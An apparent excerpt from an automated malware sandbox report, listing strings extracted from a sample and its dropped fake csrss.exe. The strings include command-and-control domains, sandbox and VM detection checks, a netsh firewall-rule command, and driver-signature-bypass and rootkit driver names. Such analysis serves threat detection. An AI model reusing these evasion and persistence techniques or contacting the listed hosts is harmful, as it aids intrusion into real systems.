            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327572896.00000000160C4000.00000004.00000001.sdmpBinary or memory string: Microsoft Windows 10 ProHKEY_USERS\ardz\Desktop\4t4y4r89UZ.exe" "C:\Users\user\Desktop\4t4y4r89UZ.exe" S-1-5-21-3853321935-2125563209-4053062332-1002RoughSnowFirstInstallDateIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzc:\users\user\desktop\4t4y4r89uz.exeintel(r) core(tm)2 cpu 6600 @ 2.40 ghzcsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeMicrosoft Windows 10 ProC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrssaa3f8HKEY_USERS\S-
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: vmhgfs$
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmpBinary or memory string: ?advapi32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTime3LFU_3R1OpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exesmartscreen.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSystemSettingsBroker.exesystemsettingsbroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmk
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.execsrss.exesharedintapp.exewinlogon.exesharedintapp.exeservices.exesharedintapp.exelsass.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exesvchost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exe4t4y4r89uz.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: [system process]vboxtray.exe
            Source: csrss.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: vmxnetvmx86$
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: systemvmsrvc.exe
            Source: csrss.exeBinary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
            Source: csrss.exeBinary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
            Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpBinary or memory string: ameNewaPINGPOSTQEMUROOTHIT!u
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
            Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpBinary or memory string: \\.\HGFS`
            Source: svchost.exe, 00000002.00000002.546816375.00000286A1040000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.547367148.0000019AEA429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: csrss.exeBinary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
            Source: csrss.exeBinary or memory string: ypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.we
            Source: csrss.exeBinary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe4t4y4r89uz.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
            Source: csrss.exeBinary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327631474.00000000160DE000.00000004.00000001.sdmpBinary or memory string: wtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exemsvmmoufShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exexenevtchn`'
            Source: csrss.exeBinary or memory string: mAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6cha
